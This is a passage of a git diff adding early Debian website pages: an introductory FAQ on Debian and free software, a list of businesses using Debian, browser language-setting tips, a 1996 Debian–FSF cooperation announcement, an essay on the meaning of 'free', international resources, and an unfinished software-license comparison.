CDs cost money.</A> +<LI><A href="#disbelief">Most software costs over a hundred dollars. How can you give it + away?</A> +<LI><A href="#hardware">What hardware is supported?</A> +<LI><A href="#other">What architectures are supported?</A> +<LI><A href="#info">Before I decide, I need more information.</A> +<LI><A href="#why">I'm still not convinced. What are some Pros and cons of Debian?</A> +<LI><A href="#install">Great. How do I get Debian</A> +<LI><A href="#supp">What kinds of support are there?</A> +<LI><A href="#who">Who are you all anyway?</A> +<LI><A href="#history">How'd it all get started?</A> +</UL> + + +<H2><A name="what">WHAT is Debian?</A></H2> +<P><A href="http://www.debian.org/">Debian</A> is a <A href="free">free, or +Open Source</A>, operating system (OS) for your computer. +An operating system is the set of basic programs and utilities that make your computer run. +At the core of an operating system is the kernel. +The kernel is the most fundamental program on the computer and does all the basic +housekeeping and lets you start other programs. +Debian uses the <A href="http://www.linux.org/">Linux</A> kernel, a completely free +piece of software started by Linus Torvalds and supported by (probably over 1000) +programmers worldwide. +A large part of the basic tools that fill out the operating system come from +<A href="http://www.gnu.org/">GNU</A>, +which are also free. +Of course, the thing that people want is software. Tools to help them +get what they want to do done, from editing documents to running a business to +playing games to writing more software. Debian comes with over 1500 +<A href="$(DISTRIB)/packages">packages</A> +(precompiled software bundled up in a nice format for easy installation on your machine) +— all of it <A href="free">free</A>. + +<P>It's a bit like a tower. At the base is Linux. On top of that are all the basic tools. +Next is all the software that you run on the computer. +At the top of the tower is Debian — carefully organizing and fitting everything +together so it all works together. + +<H2>It's all <A href="free" name="free">free?</A></H2> +<P>You may be wondering: why would people spend hours of their own time to write +software, carefully package it, and then <EM>give</EM> it all away? +The answers are as varied as the people who contribute. +Some people like to help others. +Many write programs to learn more about computers. +More and more people are looking for ways to avoid the inflated price of commercial +software. +A growing crowd contribute as a thank you for all the great free software they've +received from others. +Many in academia create free software to help get the results of +their research into wider use. +Businesses help maintain free software so they can have a say in how it develops -- +there's no quicker way to get a new feature than to implement it yourself! +Of course, a lot of us just find it great fun. + +<P>Debian is so committed to free software that we thought it would be useful if it +was formalized in a document of some sort. Thus, our +<A href="$(HOME)/social_contract">Social Contract</A> was born. + +<P>Although Debian believes in free software, there are cases where people want or need to +put commercial software on their machine. Whenever possible Debian will support this. +There are even a growing number of packages whose sole job is to install commercial software +into a Debian system. + +<H2><A href="free" name="CD">Free?</A> But the CDs cost money.</H2> +<P>You might be asking: If the software is free, then why do I have to pay for a CD? +First, you don't have to buy a CD. If you can download off the net, then +you can get Debian for no cost. +Second, when buying a disk you are paying for someone's time, capital outlay +to make the disks, and risk (in case they don't sell them all). +Third, free is used in the sense of freedom not free of cost +(although this generally brings the price down to the cost of the media). +For more information take a look at +<A href="$(HOME)/social_contract#guidelines">Debian's Free Software Guidelines</A> +or the <A href="http://www.fsf.org/">Free Software Foundation</A>'s site. + +<H2><A name="disbelief">Most software costs over 100 dollars. How can you give it away?</A></H2> +<P>A better question is how do software companies get away with charging so much? +Software is not like making a car. Once you've made one copy of your software, the +production costs to make a million more are tiny (there's a good reason Microsoft has +so many billions in the bank). + +<P>Look at it another way: if you had an endless supply of sand in your backyard, +you might be willing to give sand away. It would be foolish, though, to pay for a truck +to take it to others. You would make them come and get it themselves (equivalent to +downloading off the net) or they can pay someone else to deliver it to their door (equivalent +to buying a CD). +This is exactly how Debian operates and why most of the CDs are so cheap (less than +$5 U.S. for 2 CDs). + +<P>Although Debian is non-profit, we do have expenses. +Please buy from one of the +<A href="$(DISTRIB)/vendors">CD manufacturers</A> that +<A href="$(HOME)/donations">donate</A> a portion of your purchase to Debian. + +<H2><A name="hardware">What hardware is supported?</A></H2> +<P>Almost all common hardware is supported. +If you would like to be sure that everything you have is supported, check out +the <A href="http://sunsite.unc.edu/mdw/HOWTO/Hardware-HOWTO.html">Linux Hardware +Compatibility HOWTO</A>. + +<P>There are a few companies that make support difficult by not releasing specifications +for their hardware. Even if you have a commercial driver, you can run into +problems if the company later goes out of business +or stops support of the hardware you have. To ensure that you don't run into +such problems, check out our <A href="$(HOME)/OpenHardware/">Open Hardware Specification</A>. + +<H2><A name="other">What architectures are supported?</A></H2> +<P>Currently, we only have a public release for 80x86 based machines (386, 486, Pentium, etc). +For more information on ports to other platforms, see our +<A href="$(DEVEL)/release_info">release information</A>. + +<H2><A name="info">I'm looking for more information.</A></H2> +<P>You may want to check out our <A href="$(DOC)/FAQ/">FAQ</A>. + +<H2><A name="why">I'm still not convinced</A></H2> +<P>Not to worry. +As hard disk space has become cheap, most people have at least 500MB +of extra space. +Debian can be easily installed on this extra space and can coexist with your +existing OS. +If you need more space, you can simply delete one of the OSes (and after you +see the power of Linux, we are sure it won't be Debian). + +<P>As trying a new operating systems will take some of your valuable time, it is +understandable that you may have reservations. +For this reason we compiled a list of <A href="why_debian">pros and cons of Debian</A>. +This should help you decide whether you think it's worth it. +We Hope you'll appreciate our honesty and frankness. + +<H2><A name="install">Great. How do I get Debian</A></H2> +<P>Either buy a <A href="$(DISTRIB)/vendors">CD</A> or download it using +<A href="$(DISTRIB)/ftplist">ftp</A>. +Then check out our +<A href="ftp://ftp.debian.org/debian/stable/disks-i386/current/install.html">install +documentation</A>. If you haven't yet, you may want to first look at the +<A href="http://sunsite.unc.edu/mdw/HOWTO/Hardware-HOWTO.html">Linux Hardware +Compatibility HOWTO</A>. +Don't forget to take a look through the <A href="$(DISTRIB)/packages">packages</A> +we offer (hopefully you won't be intimidated by the sheer number). + +<H2><A name="supp">How do I get support?</A></H2> +<P>Well if you really need to pay someone, there are +<A href="$(HOME)/consultants">businesses</A> that will install and/or +maintain your machine for you. If you are willing to do a little reading, though, +you can do everything yourself. Should something you can't figure out come up, simply +try our +<A href="$(HOME)/support#mail_lists">mailing lists</A>, in particular debian-user. +Fast, friendly, free answers. +You can't get better service than that. + +<P>For users of IRC, there is a channel, #debian, dedicated to Debian, at irc.debian.org . + +<H2><A name="who">Who are you all anyway?</A></H2> +<P>Debian is produced by roughly 300 +<A href="$(DEVEL)/people">developers</A> spread around the world who volunteer +in their spare time. +Few of the developers have actually met in person. +Communication is done primarily through e-mail and the #debian IRC channel +on irc.debian.org. + +<H2><A name="history">How'd it all get started?</A></H2> +<P>[being written] + +<HR> +<P>Back to the <A href="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "intro", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/intro/businesses.wml.wrk b/english/intro/businesses.wml.wrk new file mode 100644 index 00000000000..edb1d48f20a --- /dev/null +++ b/english/intro/businesses.wml.wrk @@ -0,0 +1,209 @@ +#!wml -o ../../debian.org/intro/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - is Good for Business" + +<H1>Debian GNU/Linux is Good for Business</H1> + +<P>If sales of our last CD are any indication, use of +<A HREF="http://www.debian.org/">Debian GNU/Linux</A> around the world +is growing fast. +We like to think that this is because Debian is a well designed, easy to install +system. +In particular, we have noticed that use of Debian by businesses has been growing +tremendously. Use of Linux in business has historically been limited so this is +a welcome change. + +<P>Below are some of the reasons that businesses have started using Debian more and more: +<UL> +<LI>The quality of free software has proven itself. +<LI>Guaranteed access to source code allows companies to easily customize software. + and eliminates the fear that software will not be supported in the future. +<LI>The growth of a large number of companies that specialize in supporting + Debian. In addition, many of the people who help to produce Debian + answer questions on the user mailing lists. You can't pay for support + like this from most companies, let alone get it for free. +<LI>Ease of development. Companies that have switched to Linux have realized + much faster development times. Also, being based on Unix, the code is highly + portable and allows for more code to be reused in different projects. + Faster, easier development means lower costs and happier clients. +<LI>Low cost. Debian essentially eliminates the initial cost of the operating system. + In addition, the cost of most of the add-on software that is typically installed + on computers in the workplace can be avoided. With many businesses putting + $1000 or more of software on each computer, the savings add up fast. +<LI>Security. Linux is time tested and is becoming extremely secure. + It is already <em>much</em> more secure than any of the systems that Microsoft produces. + In the case that security related problems are found, there is usually a fix available + in less than a week. Again, availability is an asset here - it has been + shown that security through obscurity is no security at all. +<LI>Reliability. Many Linux systems stay up for weeks or even months at a time. + Generally, they only have to be rebooted because of hardware upgrades or + failures. +<LI>Interoperability. With Debian, you don't have to worry about interoperability + of machines. Networking is a fundamental part of the system, and using Samba + any Debian machine can easily communicate with your 95 and NT machines. + After all, we don't expect you to upgrade them to Debian all at once. +</UL> + +<P>All these points can have a large impact on the bottom line - profitability. +In this competitive market any advantage you can get over your competitors +is needed. + +<P>Below is a list of businesses that use Debian in the workplace. If you would like +your business shown here, simply send mail to +<A HREF="mailto:webmaster@debian.org">webmaster@debian.org</A> giving your business, +a contact address (both e-mail and snail mail, number of machines using Debian, +and how they are used (development, classroom, ISP, etc). +<HR> + +<PRE> +1. Ben Gertzfield <che@imsa.edu> + + a small ISP (got.net) in Santa Cruz, Ca., with "5 586/133s" + +2. Dave Cinege <dcinege@psychosis.com> + + "built 5 net servers for the Massachusetts college of art. P166's, + one of them dual, all had twin channel PCI DPT SmartRAID HBAs, + RAID boxes, and 45+ Gigs of storage in various RAIDS. Everything was + setup on Debian 1.3.0, and they have upgraded to 1.3.1.? themselves." + +3. Andrew Howell <andrew@avon.it.net.au> + + "I run a small ISP that's been 100% Debian since 0.91" + +4. Andreas Jellinghaus <aj@dungeon.inka.de> + + "add inka.de : a small german isp with about 1000 users. 100% debian." + + "i start work this month at a german internet provider : they use + linux and win nt. linux takes 5 times the load and is 5 times less + work. good thing this nt box : you can compare this way :-)" + +5. Tim Sailer <sailer@sun10.sep.bnl.gov> + + "Add Coastal Internet, Inc. (buoy.com). 100% debian." + +6. David Welton <davidw@cks.com> + + "The ISP's are good news, for sure, but what really impressed me is that + the people at the Linux Journal decided to go with Debian." + +7. Vincent Renardias <vincent@waw.com> + + "Add WaW (www.waw.com), mostly Debian (6 Debian machines, 1 Slackware)" + +8. Steve Phillips <sjp@siliconlogic.com> + + "Sure! I'm an ASIC design engineer. My company uses Debian for desktop + SUN workstation replacements and also as a server for home directories, + mail, web, etc. We save our Sun machines for CAD work that way." + +9. Sent in by Gergely Madarasz <gorgo@caesar.elte.hu> + + "Two ISP-s in Hungary: + alarmix.net (the biggest "small" isp here) and + telnet.hu + Both using debian on their servers (I convinced their owners about Debian + in the first place ;)). + +10. Shaun Fielder <shaun@osa.com.au> + X/Motif Software Engineer + Open Software Associates Ltd. + PO Box 4414, Ringwood, Victoria, 3134, AUSTRALIA. + Phone: +613 9871-1662, Fax: +613 9871 1711 + + "Yep. The company I work for, Open Software Associates (see www.osa.com.au + to see who we are/what we do :-), uses Linux quite heavily - mostly Debian." + + Three of our software engineers (of which I'm one) use Debian solely + for developing our company's products. + + We also have a manufacturing box, a dial-in server and two fileservers, + all of which are Debian 1.3.x installations. + + (We also have two Slackware boxes, and a couple of RedHat boxes. + Our US and German offices also use linux, but I'm not too sure how + many and/or which distributions, though I know the US guys prefer + RedHat. I'm working on them however :-) + + Our Linux boxes have always exceeded the stability and functionality + of all the commercial PC based unices that I have had to use in my + time here. + +11. Nick Busigin <nick@xwing.org> + + "I am a control system engineer and use Debian exclusively for all my + personal computing, as does my 15 year old son. At work I have set up a + Debian/GNU Linux box to provide web and email services for our engineering + group. I am planning to use Debian/GNU Linux in SCADA and possibly + control applications in the coming year. + +12. Sent in by Colin R. Telmer <mailto:telmerco@qed.econ.queensu.ca> + Institute of Intergovernmental Relations + School of Policy Studies Building, Room 309, Queen's University + Kingston, Ontario, Canada, K7L-3N6 (613)545-6000x4219 + <http://terrapin.econ.queensu.ca> + + "Just to add another - although I am an economics student, my department + (faculty machines and department servers) is being converted to Debian + from Win95 and AIX machines. Cheers." + +13. Eloy A. Paris <eparis@ven.ra.rockwell.com> + Information Technology Department + Rockwell Automation de Venezuela + Telephone: +58-2-9432311 Fax: +58-2-9431645 + + "Well, I'm very proud of what we've done with Debian: I work for + a multinational company and in the subsidiary I am located at (Venezuela) + we use Debian in 3 different sites (6 sites in the near future)." + + In the main office the main server runs DNS, WWW, mail, dial-in (PPP/SLIP), + Samba, UUCP and news. + + Another site connected with a leased line to the main office has a + Debian server that provides mail, DNS, Samba and bridging (with + IP masquerading) between the two LAN's. + + Another site (in another country) has another Debian box providing + basically the same services (DNS, mail, dial-in, Samba, UUCP). + + Everything is pretty stable and I have been able to upgrade all servers + to new Debian releases without even rebooting or being physically + in the same site where the server is. Pretty cool. + + All Debian boxes are 100% stable. Availability is also perfect. + This contrasts with, for example, our Novell server that crashed several + times before I upgraded some NLM's (I don't know which one was + causing the problems). + + The decision to use Debian (Linux) was taken locally. I convinced the + management to go with Linux and after they started to see the results + I got resources. + + Thanks Debian, thank Linux and thanks Linus et al in the first place." + +14. Christopher J. Fearnley <cjf@netaxs.com> + Linux/Internet Consulting + http://www.netaxs.com/~cjf + ftp://ftp.netaxs.com/people/cjf + + And my Debian ISP clients: + nothinbut.net (100% Debian servers) + keystonenet.com (100% Debian servers) + onit.net (100% Debian servers) + cyberworldnet.com (100% Debian) + jaguarsystems.com (2 Debian servers - still some NT that I'm trying + to convert) + +15. Philippe Troin <phil@fifi.org> + + "Other than at home, we use a debian server at work as a + SMTP/www/ftp/tftp/dhcp/DNS server and firewall. + I also tried to convince them to use Debian as fileserver, but failed, Linux + being ``only'' 25-30% faster over NT (eek!!!)." + +</PRE> + +<HR> +<P>Back to the <A href="../">Debian GNU/Linux homepage</A>. + +<:= languages ("$(WML_SRC_DIRNAME)/../..", "intro", "$(WML_SRC_BASENAME)", "english") :> diff --git a/english/intro/cn.wml b/english/intro/cn.wml new file mode 100644 index 00000000000..a826a6c2109 --- /dev/null +++ b/english/intro/cn.wml @@ -0,0 +1,66 @@ +#!wml -o ../../../debian.org/intro/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — Setting the Default Language" + +<H1>Setting the Default Language</H1> + +<P>Note: this page is not complete. If you have information on browser +configuration that isn't listed below, please send it to +<a href="mailto:webmaster@debian.org">webmaster@debian.org</a>. + +<P>Obviously, not everyone in the world uses the same language. As the +web grows it is becoming more common to find pages that are available +in multiple languages. A standard was therefore introduced, called +content negotiation, that allows a person to set the language(s) they +prefer to receive documents in. The actual version delivered is negotiated +between your browser and the server; your browser sends it's preferences +and the server decides which version to send based on your preferences, +how it is configured and what versions of the document are available. + +<P>To set the default language in your browser you have to set a +variable that gets passed to the web server. How this is done depends +on the browser you are using. + +<DL compact> +<DT><b>lynx</b> +<DD>You can either edit the preferred_language variable in your .lynxrc +or set it using the 'O' command while in lynx. +<DT><b>netscape 3.x</b> +<DD>??? +<DT><b>netscape 4.x</b> +<DD>Use +<pre> + Edit -> Preference... +then + Navigator -> Languages +Make sure you select the language from the choices. A number of people +reported problems because they typed in the language by hand. +</pre> +<DT><b>IE</b> +<DD>??? +</DL> + +<H3>What should I set the variable to?</H3> + +<P>This is written for those who have to fill in the value of the variable +by hand, for example lynx users. Netscape 4.x users should select from the +choices given. + +<P>Since the original language of the Debian web pages is English and +not all documents may be translated into your preferred language, it +is a good idea to set you preferred language variable to allow English +as a backup. For example, if you are a native French speaker using +lynx, you would want the following line in your .lynxrc +<pre> + preferred_language=fr; q=1.0, en; q=0.5 +</pre> +This tells the server that you would like the French version of the +document if available, otherwise use the English one. + +<P>For more information about setting the preferred_language variable see the +<a href="http://www.apache.org/docs/content-negotiation.html">Apache +documentation on content negotiation</a>. + +<HR> +<P>Back to the <A href="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "intro", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/intro/cooperation.wml b/english/intro/cooperation.wml new file mode 100644 index 00000000000..92d72d2a7b6 --- /dev/null +++ b/english/intro/cooperation.wml @@ -0,0 +1,36 @@ +#!wml -o ../../../debian.org/intro/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - Cooperation with the FSF" + +<H1>Cooperation with the FSF</H1> + +<HR> +<STRONG>From:</STRONG> <TT>bruce@pixar.com (Bruce Perens)</TT><BR> +<STRONG>Date:</STRONG> <TT>Sun, 21 Jul 96 18:04 PDT</TT><BR> +<STRONG>To:</STRONG> <TT>debian-announce@lists.debian.org</TT><BR> +<STRONG>Subject:</STRONG> <TT>Debian and FSF Cooperate</TT><BR> +<HR> + +<P> Some time ago, the Debian group decided to decline continued FSF +sponsorship. This was followed by some well-meaning but very poorly +stated messages that enraged many Linux participants. + +<P>After an interval of broken communications, Debian and FSF have resumed +cordial relations and are cooperating, even though FSF no longer has +the control over the project that came with their former sponsorship of +Debian, and Debian will _not_ ask for a resumption of sponsorship. Both +groups have decided that this should not keep us from working together, +and we are confident that we can mend any remaining Linux-FSF schism. + +<P>What will come of this? And end to the annoying and useless "FSF vs. +Linux" net discussion. More support for Linux in GNU software, and more +support for FSF's goals in Linux software. + +<P>To commemorate our decision that GNU and Linux should be partners, +we will resume use of the name "Debian GNU/Linux" for our system. + +<P>Bruce Perens +<BR>Debian Project Leader + +<P>Back to the <A HREF="../">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "intro", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/intro/free.wml b/english/intro/free.wml new file mode 100644 index 00000000000..3d19eff1c8d --- /dev/null +++ b/english/intro/free.wml @@ -0,0 +1,133 @@ +#!wml -o ../../../debian.org/intro/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - What Does Free Mean?" + +<H1>What Does Free Mean?<BR> +<tt>or</tt> What do you mean by Open Software?</H1> + +<b>Note:</b> In February 1998 a group moved to replace the term "Free +Software" by "Open Software". As will become clear in the discussion +below, they both refer to the same thing since "Open" refers to the availability +of the source code. As both are in common usage it was decided to +keep this document (with minor modifications) at this time. + +<P>Many people new to free software find themselves confused because +the word "free" in the term "free software" is not used the way they expect. +To them free means "at no cost". +My dictionary lists seventeen different meanings for "free". +Only one of them is "at no cost". The rest refer to liberty +and lack of constraint. When we speak of <em>Free Software</em>, +we mean freedom not price. + +<P>Software that is free only in the sense that you don't need to pay +to use it is hardly free at all. You may be forbidden to pass it on, +and you are almost certainly prevented from improving it. Software +licensed at no cost is usually a weapon in a marketing campaign to +promote a related product or to drive a smaller competitor out of +business. There is no guarantee that it will stay free. + +<P>Truly free software is always free. Software that is placed in the +public domain can be snapped up and put into non-free programs, and +be free no more. To stay free, software must be copyrighted and licensed. + +<P>To the uninitiated, either a piece of software is free or it isn't. Real life +is much more complicated than that. To understand what kinds of things people +are implying when they call software free we must take a little detour into +the world of software licenses. + +<P>Copyrights are a method of protecting the rights of the creator of +certain types of works. +In most countries, software you write is automatically copyrighted. +A license is the authors way of allowing use of his creation (software in this case), +by others, in ways that are acceptable to him. +It is up to the author to include a license which declares in what ways the software may be used. +For a proper discussion of copyright see +<A HREF="http://lcweb.loc.gov/copyright/">http://lcweb.loc.gov/copyright/</A>. + +<P>Of course, different circumstances call for different licenses. +Software companies are looking to protect their assets so they only release compiled code +(which isn't human readable) and put many restrictions on the use of the software. +Authors of free software on the other hand are generally looking for some combination of the following: +<UL> +<LI>Not allowing use of their code in commercial software. Since they are releasing the code + for others to use without any profit to themselves, they don't want someone else to be + able to come along and make commercial software out of it. +<LI>Protecting identity of authorship of the code. People take great pride in their work + and do not want someone else to come along and remove their name from it or claim that + they wrote it. +<LI>Distribution of source code. One of the problems with most commercial code is that you + can't fix bugs or customize it since the source code is not available. Also, the company + may decide to stop supporting the hardware you use. Many free licenses + force the distribution of the source code. This protects the user by allowing them to + customize the software for their needs. This also has other + ramifications which will be discussed later. +<LI>Forcing any work that includes part of their work (such works are called <em>derived + works</em> in copyright discussions) to use the same license. +</UL> + +<P>Many people write their own license. This is frowned upon as writing a +license that does what you want involves subtle issues. Too often the wording used is +either ambiguous or people create conditions that conflict with each other. +Writing a license that would hold up in court is even harder. +Luckily, there are a number of licenses already written that probably +do what you want. + +<P>Four of the most widely found licenses are: +<UL> +<LI>The <A HREF="http://www.gnu.org/">GNU General Public License (GPL)</A>. +Some good background information on software licenses and a copy of the license can +be found at +<A HREF="http://www.gnu.org/copyleft/copyleft.html">http://www.gnu.org/copyleft/copyleft.html</A>. +This is the most common free license in use in the world. + +<LI>Artistic License +<A HREF="http://language.perl.com/misc/Artistic.html">http://language.perl.com/misc/Artistic.html</A>. + +<LI><A HREF="../misc/bsd.license">BSD style license</A>. + +<LI><A HREF="../misc/modified.bsd.license">Modified BSD license</A>. +</UL> +<!-- +Clearly, no single license will fit everyone's needs. To help people select +the license that is most appropriate for them, you might like to look at +our <A HREF="license_disc">comparison of common Free (Open) Software licenses</A>. +--> + +<P>Some of the features these licenses have in common. +<UL> +<LI>You can install the software on as many machines as you want. +<LI>Any number of people may use the software at one time. +<LI>You can make as many copies of the software as you want and give them + to whomever you want (free or open redistribution). +<LI>There are no restriction on modifying the software (except for keeping certain + notices intact). +<LI>There is no restriction on selling the software. +</UL> + +<P>This last point, which allows the software to be sold for money seems to go +against the whole idea of free software. It is actually one of its strengths. +Since the license allows free redistribution, once one person gets a copy +they can distribute it themselves. They can even try to sell it. +The idea behind this is that it costs essentially no money to make electronic +copies of software. Supply and demand will keep the cost down. If it +is convenient for a large piece of software or an aggregate of software +to be distributed by some media, such as CD, the vendor is free to charge +what they like. If the profit margin is too high, however, new vendors will +enter the market and competition will drive the price down. +As a result, you can buy a 2 CD distribution of Debian for less than $5US. + +<P>While free software is not totally free of constraints (only putting something +in the public domain does that) it gives the user the flexibility +to do what he needs in order to get work done. At the same time, it protects +the the rights of the author. Now that's freedom. + +<P>Debian GNU/Linux is a strong supporter of free software. Since many different +licenses are used on software, a set of guidelines, the +<A HREF="../social_contract#guidelines">Debian Free Software Guidelines (DFSG)</A> +were developed to come up with a reasonable definition of what +constitutes free software. Only software that complies with the DFSG is allowed +in the main distribution of Debian. + +<HR> +<P>Back to the <A href="../">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "intro", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/intro/international.wml b/english/intro/international.wml new file mode 100644 index 00000000000..2d32a0b8f16 --- /dev/null +++ b/english/intro/international.wml @@ -0,0 +1,94 @@ +#!wml -o ../../../debian.org/intro/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — Goes International" + +<H1>Debian Goes International</H1> + +<HR> + +<P>As use of Debian spreads, the need for documentation and other +resources in multiple languages has been increasing. Although currently +small, it is expected that this page will grow quickly as more +documentation is translated into other languages. + +<HR> + +<H2><A NAME="French">French</A></H2> + <UL> + <LI>French user mailing list. + To subscribe send a message to + <A href="mailto:debian-french-request@lists.debian.org">debian-french-request@lists.debian.org</A> + with<BR> + subscribe <your_email_address><BR> + in the body. + <LI>French web site. It includes: + <UL lang=fr> + <LI><A href="http://www.teaser.fr/~clebars/debian/docs-1.3/install.fr.html"> + Le manuel d'installation de Debian 1.3</A> + <LI><A href="http://www.teaser.fr/~clebars/debian/historique/debian_manifesto-fr"> + Le Manifeste de Debian Linux</A> + <LI><A href="http://www.teaser.fr/~clebars/debian/docs-1.3/release-1.3.fr"> + L'annonce de la sortie de Debian 1.3</A> + <LI><A href="http://www.teaser.fr/~clebars/debian/fdp/docs/markup.fr.html/index.html"> + Le Manuel de Debiandoc-SGML</A> + </UL> + </UL> + +<H2><A NAME="German">German</A></H2> + <UL> + <LI lang=de><A href="German/social_contract_de.html">“Gesellschaftsvertrag” mit der + Gemeinschaft für freie Software</A> + <LI>German user mailing list. + To subscribe send a message to + <A href="mailto:majordomo@jfl.de">majordomo@jfl.de</A> with<BR> + subscribe debian-user-de <your_email_address><BR> + in the body. + </UL> +<H2><A NAME="Italian">Italian</A></H2> + <UL> + <LI lang=it>Mailing list per utenti di lingua italiana. + Per iscriversi inviate un messaggio a + <A href="mailto:debian-italian-request@lists.debian.org"> + debian-italian-request@lists.debian.org</A> + contenente<BR> + subscribe <il_vostro_indirizzo_email>.<BR> + <LI><A href="$(ITALIAN)/doc/installazione/index.html">Manuali di installazione</a> + <LI>Sul sito Italiano del Pluto (<A + href="http://www.pluto.linux.it">www.pluto.linux.it</A>) troverete: + <UL> + <LI><A href="http://www.pluto.linux.it/ildp/Debian/index.html"> + I manuali di installazione di Debian 1.3 in Italiano.</A> + <LI><A href="ftp://pluto.linux.it/pub/debian-it"> + Le immagini dei dischi di installazione in Italiano</A> + <LI><A href="http://www.pluto.linux.it/ildp/index.html"> + Una serie impressionante di HOWTO, guide, libri ecc. su Linux + tradotti in Italiano.</A> + <LI>Un paio di Manuali Linux scritti originali in italiano: + <A href="http://www.pluto.linux.it/ildp/AppuntiLinux/index.html"> + Appunti Linux</A> e + <A href="http://www.pluto.linux.it/ildp/guide/PrgCulturale/index.html"> + Progetto Culturale</A> + </UL> + </UL> +<H2><A NAME="Japanese">Japanese</A></H2> + <UL> + <LI><A href="http://www.debian.linux.or.jp/">Japanese language version of Debian</A> + <LI><A href="http://www.bekkoame.or.jp/~kamop/Debian/debian-policy.html">Debian + policy manual in Japanese</A> + </UL> +<H2><A NAME="Spanish">Spanish</A></H2> + <UL lang=es> + <LI>Lista de correo para usuarios de habla hispana. + Para suscribirse envie un mensaje a: + <A href="mailto:debian-user-spanish-request@lists.debian.org"> + debian-user-spanish-request@lists.debian.org</A> + con<BR> + subscribe <su_dirección_de_correo-e><BR> + en el contenido. + <LI><A href="$(SPANISH)/doc/instalacion/instalacion.html">Instrucciones para la + instalación</A> + </UL> + +<HR> +<P>Back to the <A href="$(HOME)/">Debian GNU/Linux homepage</A>. + +<:= languages ("$(WML_SRC_DIRNAME)/../..", "intro", "$(WML_SRC_BASENAME)", "english") :> diff --git a/english/intro/license_disc.wml b/english/intro/license_disc.wml new file mode 100644 index 00000000000..25c97e08fa5 --- /dev/null +++ b/english/intro/license_disc.wml @@ -0,0 +1,133 @@ +#!wml -o ../../../debian.org/intro/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - Comparison of Software Licenses" + +******This document is under development******* +<H1>Comparison of Software Licenses</H1> + +<P>People who have been around Open Software tend to develop very strong +opinions about licenses. Beginners don't worry about them as much +since they are more concerned with finishing the task at hand and +don't understand the long term implications of choosing software with +one license over another (it is doubtful that there +many people who understand the nuances of licensing that don't have +strong opinions on the matter). + +<P>Over the years a number of licenses have gained prominence as they +give software authors the type of control over their creations that +most developers desire. It is still common to find software that has +no copyright visible or contains a unique license developer by the +author. The last can be quite annoying to distributors of software +(both on-line and people who create CDs) as many of these licenses +contain <A HREF="#mistakes">common mistakes</A> which make the software +difficult to distribute. + +<P>What follows is a list of common Free (Open) software licenses and +some good and bad points of each. +Only the points in the license relevant to the discussion are shown. +Also, many points are listed under the heading "GOOD/BAD". +These are points that can be either good or bad, depending on your point of view. + +<UL> +<LI>The <A HREF="http://www.gnu.org/">GNU General Public License (GPL)</A>. + <BR> + <B>SUMMARY:</B> source code must be made available; software may be sold; + derived works must use the same license + <BR> + <B>GOOD:</B> There is good reason this is the most used license for Free (Open) + software. It does a good job of protecting the rights of software developers + and the availability of source code guarantees that users won't have to worry + about losing support in the future. + <BR> + <B>GOOD/BAD:</B> Software released using the GPL can not be incorporated into + commercial software. + Whether this is actually a bad thing depends on your + point of view. People developing commercial software often feel frustrated + when there is a solution available that can't be used because of conflicts in + licensing. Of course, there is nothing stopping them from + contacting the author and seeing if they can buy a version using a different + license. + Anyone who releases software using the GPL does not consider these restrictions + bad, because it prevents others from making money off of their hard work while + allowing others to use it. + +<LI>Artistic License + <A HREF="http://language.perl.com/misc/Artistic.html">http://language.perl.com/misc/Artistic.html</A>. + <BR> + <B>SUMMARY:</B> + <BR> + <B>GOOD:</B> + <BR> + <B>BAD:</B> + +<LI><A HREF="../misc/bsd.license">BSD style license</A>. + <BR> + <B>SUMMARY:</B> Binaries and source code must contain the license; + advertising must acknowledge the developers listed in the license + <BR> + <B>GOOD/BAD:</B> Companies that want an executable to be generally available + (possibly for free) without releasing the source code often like + this license. A good example is a company that wants to release a driver + for a graphics card. Open Source advocates would prefer that the company + release hardware specifications anyway. If the development of drivers + for XFree86 is indicative, the best drivers are those written with + source available. Companies are only making their products look bad by + releasing proprietary drivers that are slow and buggy. They can also + save development costs by letting others develop the driver for them. + <BR> + <B>GOOD/BAD:</B> Anyone may take the source, modify it, and release the + result without releasing the changes. Whether you think this is good or + bad is a personal preference. + +<LI><A HREF="../misc/modified.bsd.license">Modified BSD license</A>. + <BR> + <B>SUMMARY:</B> Just like the BSD license above except the advertising + clause has been removed. + <BR> + <B>GOOD:</B> With the development of Linux distributions large + collections of software distributed. Under the advertising clause + of the BSD license all the developers must be listed in all advertising. + This becomes ridiculous as the number of developers grows into the + thousands. Thus many people are advocating the use of a modified + version of the BSD style license without this clause. +</UL> + +<HR> +<A name="mistakes"> +Some common mistakes in self-written licenses: +<UL> +<LI>Either not allowing, or restricting for-profit sale of the software. + This makes it difficult to distribute the software on CD. People often + make the mistake of using terms that are not well defined, such as 'reasonable cost'. + It is better to simply use one of the licenses mentioned above as they accomplish + the same thing without resorting to such phrases. + For example, by allowing anyone to distribute the software, the GPL keeps the + costs down by the usual market forces. If someone is selling a CD with a high + profit margin it won't be long before competitors enter the market and sell + for a lower price. + <BR>Note: the Artistic License does use the term `Reasonable copying fee', but + qualifies the term in an attempt to make it less vague. +<LI>Not allowing distribution of modified versions of the software. + This hinders distribution of the software by certain groups. For example, since + Debian distributes compiled software, it is often necessary to modify the source + to get it to compile or to make it comply with the + <A HREF="http://www.pathname.com/fhs/">FHS</A>. + But by doing this, we are then not allowed to distribute it. +<LI>Requiring that all changes to the software be reported to the author. While it is + a good idea to report changes/improvements to the author so they can be more widely + distributed, making it a requirement can cause problems. How many people know + where they will be in 5 years? + Simply change it to 'Any changes to the software should be reported to the author'. + Most people will. + <BR>This clause is usually included to prevent branch projects from developing. + History has shown that as long as development on the original code doesn't stall + branches only succeed if there are other forces driving the split. +<LI>Stating that the software is public domain, but then adding constraints (such 